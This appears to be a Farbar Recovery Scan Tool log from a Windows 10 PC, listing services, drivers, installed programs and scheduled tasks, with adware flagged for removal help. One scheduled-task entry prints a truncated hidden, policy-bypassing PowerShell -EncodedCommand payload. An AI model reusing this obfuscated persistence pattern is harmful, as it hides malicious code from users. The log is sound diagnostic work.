CHR Extension: (Chrome Web Store Payments) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-08-06]
CHR Extension: (Gmail) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-01-30]
CHR Extension: (Chrome Media Router) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-08-08]
CHR HKLM\...\Chrome\Extension: [kofkpgiaknijknhajbhnghkodiccblkg] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-2783097096-289569773-1546617986-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [kofkpgiaknijknhajbhnghkodiccblkg] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [kofkpgiaknijknhajbhnghkodiccblkg] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [361984 2012-02-10] (Advanced Micro Devices, Inc.) [File not signed]
R2 BackupService; C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupService.exe [247808 2016-05-06] (SpeedyPC Software) [File not signed]
R2 BitDefenderCOM; C:\Program Files\BDServices\BitDefenderCom.exe [1012736 2016-06-24] (Digital Care Solutions) [File not signed]
R3 scan; C:\Program Files\BDServices\scan.dll [602456 2016-06-14] (Bitdefender)
R2 SlimService; C:\Program Files\SlimService\SlimServiceFactory.exe [252096 2016-07-25] (SlimWare Utilities, Inc.)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [253960 2016-04-27] (Synaptics Incorporated)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-29] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2016-06-30] (Microsoft Corporation)
R2 ZAtheros Bt&Wlan Coex Agent; C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe [158880 2012-01-19] (Atheros) [File not signed]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [102912 2015-05-28] (Advanced Micro Devices)
S3 lehidmini; C:\WINDOWS\system32\drivers\leath_hid.sys [36128 2012-01-19] (Atheros) [File not signed]
R0 MBAMSwissArmy; C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys [136408 2015-12-11] (Malwarebytes Corporation)
R3 RSP2STOR; C:\WINDOWS\system32\DRIVERS\RtsP2Stor.sys [310528 2015-06-05] (Realtek Semiconductor Corp.)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [589824 2015-10-29] (Realtek )
R2 sbmntr; C:\Program Files (x86)\YTDownloader\sbmntr.sys [58528 2015-10-22] (YTDownloader)
S3 ssmirrdr; C:\WINDOWS\system32\DRIVERS\ssmirrdr.sys [10112 2015-06-29] (support.com, Inc)
S3 SWDUMon; C:\WINDOWS\system32\DRIVERS\SWDUMon.sys [13920 2017-02-10] ()
R3 Trufos; C:\WINDOWS\System32\DRIVERS\Trufos.sys [452040 2016-06-14] (BitDefender S.R.L.)
S1 vwcgkjth; C:\WINDOWS\system32\drivers\vwcgkjth.sys [55168 2017-02-10] (Microsoft Corporation)
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44568 2015-10-29] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [293216 2015-10-29] (Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [118112 2015-10-29] (Microsoft Corporation)
R3 WirelessKeyboardFilter; C:\WINDOWS\System32\drivers\WirelessKeyboardFilter.sys [49896 2016-07-22] (Microsoft Corporation)
U3 idsvc; no ImagePath
U3 wpcsvc; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-02-10 21:46 - 2017-02-10 21:46 - 00055168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vwcgkjth.sys
2017-02-10 21:46 - 2017-02-10 21:46 - 00001291 _____ C:\Users\Randy\Desktop\Google Chrome.lnk
2017-02-10 21:27 - 2017-02-10 21:47 - 00000000 ____D C:\Users\Randy\Desktop\Virus
2017-02-10 21:27 - 2017-02-10 21:27 - 00000000 ____D C:\Users\Randy\Desktop\New folder

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-02-10 21:50 - 2016-08-08 22:41 - 00000512 _____ C:\WINDOWS\Tasks\SpeedyBackup reigistration schedule.job
2017-02-10 21:47 - 2015-10-29 23:24 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-02-10 21:47 - 2014-09-12 16:11 - 00000000 ____D C:\FRST
2017-02-10 21:46 - 2016-02-15 14:41 - 00000000 ____D C:\Users\Randy\AppData\Local\{3A700C2C-1ED8-6094-7340-457C5728B9E4}
2017-02-10 21:46 - 2015-10-29 23:24 - 00000000 ___HD C:\Program Files\WindowsApps
2017-02-10 21:45 - 2016-02-02 10:45 - 00000000 ____D C:\Users\Randy\AppData\Local\Packages
2017-02-10 21:42 - 2016-05-14 18:42 - 00000284 _____ C:\WINDOWS\Tasks\{4E20A085-1B30-164D-0726-6688F373B3A8}.job
2017-02-10 21:41 - 2016-02-15 14:41 - 00000284 _____ C:\WINDOWS\Tasks\UpdateTask.job
2017-02-10 21:36 - 2013-01-03 20:56 - 00003416 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2017-02-10 21:36 - 2013-01-03 20:56 - 00003292 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2017-02-10 21:33 - 2015-10-29 23:21 - 00000000 ____D C:\WINDOWS\INF
2017-02-10 21:31 - 2012-03-01 11:01 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2017-02-10 21:24 - 2013-02-24 22:05 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2017-02-10 21:23 - 2016-02-02 10:17 - 01010686 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-02-10 21:21 - 2016-08-08 22:41 - 00000496 _____ C:\WINDOWS\Tasks\SpeedyBackup Startup.job
2017-02-10 21:19 - 2015-10-29 23:24 - 00000000 ____D C:\WINDOWS\system32\NDF
2017-02-10 21:18 - 2016-08-08 20:54 - 00000474 _____ C:\WINDOWS\Tasks\RegCure Pro Startup.job
2017-02-10 21:17 - 2016-08-06 19:12 - 00000432 _____ C:\WINDOWS\Tasks\DriverUpdate Startup.job
2017-02-10 21:16 - 2016-08-08 22:41 - 00000530 _____ C:\WINDOWS\Tasks\SpeedyPC Update Version3 Startup Task.job
2017-02-10 21:16 - 2016-08-08 22:41 - 00000522 _____ C:\WINDOWS\Tasks\SpeedyBackup reigistration schedule startup.job
2017-02-10 21:16 - 2016-01-15 09:52 - 00013920 _____ C:\WINDOWS\system32\Drivers\SWDUMon.sys

==================== Files in the root of some directories =======

2016-08-08 20:54 - 2017-02-10 21:18 - 0000115 _____ () C:\Users\Randy\AppData\Roaming\LogFile.txt
2016-06-19 06:26 - 2016-06-19 06:26 - 2049556 _____ () C:\Users\Randy\AppData\Roaming\sb0.dat
2016-06-10 06:41 - 2016-06-10 06:41 - 2049556 _____ () C:\Users\Randy\AppData\Roaming\sb203.dat
2016-02-17 11:41 - 2016-08-05 17:41 - 0000228 _____ () C:\Users\Randy\AppData\Roaming\WB.CFG
2015-11-15 15:05 - 2015-11-15 15:05 - 0002560 _____ () C:\Users\Randy\AppData\Local\uninstall.exe
2015-01-27 15:51 - 2015-01-27 15:51 - 0000057 _____ () C:\ProgramData\Ament.ini

Files to move or delete:
====================
C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe
C:\Windows\Tasks\{4E20A085-1B30-164D-0726-6688F373B3A8}.job


Some files in TEMP:
====================
2016-08-08 22:40 - 2016-08-08 22:41 - 8464000 _____ (SpeedyPC Software Inc.) C:\Users\Randy\AppData\Local\Temp\OMD5938.tmp.exe

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2016-08-08 21:12

==================== End of FRST.txt ============================

 

[glhglh]

Addition 1:
Ran by Randy (10-02-2017 21:51:52)
Running from C:\Users\Randy\Desktop\Virus
Windows 10 Home Version 1511 (X64) (2016-02-02 18:44:56)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-2783097096-289569773-1546617986-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2783097096-289569773-1546617986-503 - Limited - Disabled)
Guest (S-1-5-21-2783097096-289569773-1546617986-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2783097096-289569773-1546617986-1011 - Limited - Enabled)
Randy (S-1-5-21-2783097096-289569773-1546617986-1001 - Administrator - Enabled) => C:\Users\Randy

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Reader XI (11.0.19) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.19 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.6 (HKLM-x32\...\Adobe Shockwave Player) (Version: 11.6.3.633 - Adobe Systems, Inc.)
AMD Catalyst Install Manager (HKLM\...\{9D1400EC-5703-3983-53B7-AEFB8BFD1CFA}) (Version: 3.0.864.0 - Advanced Micro Devices, Inc.)
AOL Uninstaller (Choose which Products to Remove) (HKLM-x32\...\AOL Uninstaller) (Version: - AOL Inc.)
Atheros Bluetooth Suite (64) (HKLM\...\{230D1595-57DA-4933-8C4E-375797EBB7E1}) (Version: 7.4.0.120 - Atheros)
Atheros Driver Installation Program (HKLM-x32\...\{C3A32068-8AB1-4327-BB16-BED9C6219DC7}) (Version: 9.2 - Atheros)
Blio (HKLM-x32\...\{74A8E1BE-D438-4C35-ABFF-3A1EAF17526E}) (Version: 2.2.8530 - K-NFB Reading Technology, Inc.)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DHTML Editing Component (HKLM-x32\...\{2EA870FA-585F-4187-903D-CB9FFD21E2E0}) (Version: 6.02.0001 - Microsoft Corporation)
Download Updater (AOL Inc.) (HKLM-x32\...\SoftwareUpdUtility) (Version: - AOL Inc.) <==== ATTENTION
Driver Detective (HKLM-x32\...\DriversHQ.DriverDetective.Client) (Version: 10.1.2.44 - PC Drivers HeadQuarters LP)
Driver Restore (HKLM\...\Driver Restore) (Version: 2.5.0.0 - 383 Media, Inc.)
DriverUpdate (HKLM-x32\...\DriverUpdate) (Version: 2.6.4 - Slimware Utilities Holdings, Inc.)
DriverUpdate (x32 Version: 2.6.4 - Slimware Utilities Holdings, Inc.) Hidden
Ear Training 101 - Full Version (HKLM-x32\...\Ear Training 101 - Full Version4.0) (Version: - )
Ear Training 101 & Rhythmic Patterns (HKLM-x32\...\Ear Training 101 & Rhythmic Patternsv. 4.0) (Version: v. 4.0 - Music Unlimited Inc.)
ESU for Microsoft Windows 7 SP1 (HKLM-x32\...\{768A6276-5822-489C-8A2B-67190F745655}) (Version: 4.1.2 - Hewlett-Packard)
Evernote v. 4.5.2 (HKLM-x32\...\{8CE152BA-1D16-11E1-867D-984BE15F174E}) (Version: 4.5.2.5904 - Evernote Corp.)
FileASSASSIN (HKLM-x32\...\FileASSASSIN) (Version: 1.06 - Malwarebytes)
FromDocToPDF Internet Explorer Homepage and New Tab (HKU\S-1-5-21-2783097096-289569773-1546617986-1001\...\FromDocToPDFTooltab Uninstall Internet Explorer) (Version: - Mindspark Interactive Network) <==== ATTENTION
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 52.0.2743.116 - Google Inc.)
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
Hewlett-Packard ACLM.NET v1.1.2.0 (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
HP 3D DriveGuard (HKLM\...\{B1A6285F-C31A-4482-8EA0-9445E4C1DCEA}) (Version: 4.1.10.1 - Hewlett-Packard Company)
HP Application Assistant (HKLM\...\{6032497A-4479-462B-ADB8-A0A372BB9A23}) (Version: 1.0.409.3882 - Hewlett-Packard)
HP Connection Manager (HKLM-x32\...\{B65FCAA5-F3A6-4B3F-ABEE-CBC2B085796B}) (Version: 4.1.25.1 - Hewlett-Packard Company)
HP CoolSense (HKLM-x32\...\{16B7BDA1-B967-4D2D-8B27-E12727C28350}) (Version: 2.10.3 - Hewlett-Packard Company)
HP Deskjet 1510 series Basic Device Software (HKLM\...\{D17E60E8-478A-4D4A-8147-21D481B5CA55}) (Version: 32.2.188.47710 - Hewlett-Packard Co.)
HP Deskjet 1510 series Help (HKLM-x32\...\{2E25FCEB-EFCB-4696-AA01-D3CBAC721831}) (Version: 30.0.0 - Hewlett Packard)
HP Documentation (HKLM-x32\...\{16652164-D80F-4EE6-90C6-2E8D5D06092A}) (Version: 1.1.0.0 - Hewlett-Packard)
HP FWUpdateEDO2 (HKLM-x32\...\{415FA9AD-DA10-4ABE-97B6-5051D4795C90}) (Version: 1.2.0.0 - Hewlett-Packard)
HP OfficeJet 3830 series Basic Device Software (HKLM\...\{644380A4-11D0-48CB-AAB8-CCB6BD072784}) (Version: 36.0.72.54013 - Hewlett-Packard Co.)
HP On Screen Display (HKLM-x32\...\{ED1BD69A-07E3-418C-91F1-D856582581BF}) (Version: 1.3.5 - Hewlett-Packard Company)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.7702 - HP)
HP Quick Launch (HKLM-x32\...\{C61FCEC2-3ED4-496E-B4B4-1CED423824B9}) (Version: 2.6.2 - Hewlett-Packard Company)
HP Security Assistant (HKLM\...\{F9DF0B5D-554B-45D2-8698-7C467FAF4BCA}) (Version: 2.0.2 - Hewlett-Packard Company)
HP Setup (HKLM-x32\...\{F5E7D9AF-60F6-4A30-87E3-4EA94D322CE1}) (Version: 9.0.15109.3899 - Hewlett-Packard Company)
HP Setup Manager (HKLM-x32\...\{AE856388-AFAD-4753-81DF-D96B19D0A17C}) (Version: 1.2.14901.3869 - Hewlett-Packard Company)
HP Software Framework (HKLM-x32\...\{6DE80866-EF92-47C1-80F5-1EA83B7A0AA2}) (Version: 4.5.4.1 - Hewlett-Packard Company)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HPDiagnosticAlert (x32 Version: 1.00.0001 - Microsoft) Hidden
IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6381.0 - IDT)
iSEEK AnswerWorks English Runtime (HKLM-x32\...\{18A8E78B-9EF2-496E-B310-BCD8E4C1DAB3}) (Version: 010.000.0101 - Vantage Linguistics)
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden <==== ATTENTION
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Access database engine 2007 (English) (HKLM-x32\...\{90120000-00D1-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Click-to-Run 2010 (HKLM-x32\...\Office14.Click2Run) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Starter 2010 - English (HKLM-x32\...\{90140011-0066-0409-0000-0000000FF1CE}) (Version: 14.0.5139.5005 - Microsoft Corporation)
Microsoft Office Word Viewer 2003 (HKLM-x32\...\{90850409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50428.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Streets & Trips 2009 (HKLM-x32\...\{C82185E8-C27B-4EF4-2009-4444BC2C2B6D}) (Version: 16.0.18.1000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.30319 (HKLM\...\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319 (HKLM-x32\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation)
Mozilla Firefox 27.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 27.0 (x86 en-US)) (Version: 27.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 27.0 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
NowUSeeIt Player (HKLM-x32\...\{C0AFC06A-6C9E-420F-AABF-B1AC7EE1F589}) (Version: 1.7.0.1 - NowUSeeIt Player) <==== ATTENTION
OpenOffice 4.1.1 (HKLM-x32\...\{9395F41D-0F80-432E-9A59-B8E477E7E163}) (Version: 4.11.9775 - Apache Software Foundation)
opensource (x32 Version: 1.0.14960.3876 - Your Company Name) Hidden
PdaNet+ for Android 4.12 (HKLM-x32\...\PdaNet_is1) (Version: - June Fabrics Technology Inc)
PlayReady PC Runtime x86 (HKLM-x32\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
PowerFingers Ch. 1 (HKLM-x32\...\PowerFingers Ch. 1) (Version: - Music Unlimited Inc.)
PrintMaster 12 (HKLM-x32\...\{2A304FDE-F4E3-446D-AA0D-31425C897B71}) (Version: - Broderbund LLC)
Product Improvement Study for HP Deskjet 1510 series (HKLM\...\{35DB2630-846E-47C5-AF84-9D6AC3629F55}) (Version: 32.2.188.47710 - Hewlett-Packard Co.)
Quicken 2014 (HKLM-x32\...\{0877F595-254F-45F4-991D-3F72E86B17CE}) (Version: 23.1.7.6 - Intuit)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.48.823.2011 - Realtek)
Realtek PCIE Card Reader (HKLM-x32\...\{C1594429-8296-4652-BF54-9DBE4932A44C}) (Version: 6.1.7601.29004 - Realtek Semiconductor Corp.)
RegCure Pro (HKLM-x32\...\{C547F361-5750-4CD1-9FB6-BC93827CB6C1}) (Version: 3.3.14.1 - ParetoLogic, Inc.) <==== ATTENTION
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
SlimCleaner Plus (HKLM\...\SlimCleaner Plus) (Version: 2.5.8 - Slimware Utilities Holdings, Inc.)
SlimCleaner Plus (Version: 2.5.8 - Slimware Utilities Holdings, Inc.) Hidden
SpeedyBackup (HKLM-x32\...\{6FF10046-D763-4859-A5C7-8AD81B9C8427}) (Version: 5.0.5.0 - SpeedyPC Software)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.12.98 - Synaptics Incorporated)
Turbo Lister 2 (HKLM-x32\...\{8927E07C-97F7-4A54-88FB-D976F50DD46E}) (Version: 2.00.0000 - eBay Inc.)
Viewpoint Media Player (HKLM-x32\...\ViewpointMediaPlayer) (Version: - )
WinALDL (HKLM-x32\...\WinALDL) (Version: - )
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3538.0513 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {02838A17-EB1E-41DC-A610-4FACFC9CFC90} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> No File <==== ATTENTION
Task: {05DF4A16-BE01-4E34-A027-CB8165CA61E8} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => %SystemRoot%\ehome\ehPrivJob.exe
Task: {085C37EA-1E33-4C9E-87B8-3E576F3FE4AB} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {0B0B1AAD-0AF0-4618-BDEF-CDDEDF582AD0} - System32\Tasks\JZIP => C:\Program Files (x86)\JZIP\JZIP\JZIP.exe <==== ATTENTION
Task: {0CBCDC29-56A3-4015-A06E-8FD4AABD553B} - \SmartWeb Upgrade Trigger Task -> No File <==== ATTENTION
Task: {0CFE2E40-6A97-48C5-9F38-DE82315CF1B0} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => sc.execonfig upnphost start= auto
Task: {0EBA43D3-D7BE-4AE6-9462-F46D199BCC46} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => %SystemRoot%\ehome\mcupdate.exe
Task: {152C1E5E-5706-4609-8FFF-8D8B15AFDDAA} - System32\Tasks\{090C7947-7904-0E0F-0A11-0B7E7F79117F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9400 more characters). <==== ATTENTION
Task: {1C1C75BB-4B69-4971-89E7-D4A89F91354E} - System32\Tasks\CRWKRUVUBYBCAXNB => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
Task: {1E0973D5-7653-49B7-B013-63DB348A9012} - \ShopperProJSUpd -> No File <==== ATTENTION
Task: {1EAE785B-1358-435B-86E7-5860D0FEE3D6} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {207BFC61-FFED-4507-8EDD-6AA5AE1C8A47} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => %SystemRoot%\ehome\ehPrivJob.exe
Task: {2256FEB8-E941-4264-AD41-D3DD3B8E85D1} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\MpCmdRun.exe
Task: {2391AF7C-19CC-4AED-9222-E7E2F5CF9B9F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-03] (Google Inc.)
Task: {24625A46-03C1-4745-AFC8-58F70A4CA83B} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => %SystemRoot%\ehome\ehPrivJob.exe
Task: {2865D75A-9EFF-4BDA-A98B-E2BAFD745E88} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => %SystemRoot%\ehome\ehrec.exe
Task: {2A9BA1F7-EAEA-4938-9457-630770B8CA56} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => %windir%\ehome\MCUpdate.exe
Task: {2C627394-07F4-4001-84C6-96DA554AC5A0} - \IBUpd -> No File <==== ATTENTION
Task: {2F0B453C-7978-474F-B2DD-511436B54629} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
Task: {35D93F14-F697-4D00-9872-F3A2EE485306} - System32\Tasks\Beach Kit => Rundll32.exe "C:\Users\Randy\AppData\Local\Beach Kit\{B29DDEDA-90AD-4218-7C20-9BC475FF709E}\BeachKit.dll",#3
Task: {39E77F7F-3017-488D-B44D-3D34D66F423B} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPSFMessenger\HPSFMsgr.exe [2011-09-09] (Hewlett-Packard Company)
Task: {4141D743-61D5-4790-8B3F-9B77C8B78A87} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => %SystemRoot%\ehome\ehPrivJob.exe
Task: {477A9893-3F9C-40B5-ADA0-FC96EE6735EC} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {49E80698-374B-426E-BD1D-E0ECDA6BD4A4} - \SwiftSearch Auto Updater 1.10.0.25 Core -> No File <==== ATTENTION
Task: {4CD1D841-791C-485F-9229-FDD5EE9C27CF} - System32\Tasks\SpeedyBackup reigistration schedule startup => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\SpeedyBackup.exe [2016-05-06] () <==== ATTENTION
Task: {4D2E3B92-6CEE-4C6C-82C1-BF7C4B59FE7E} - \systemmgr -> No File <==== ATTENTION
Task: {4DB10E48-560F-4E83-A1B5-16CEB0A07A99} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
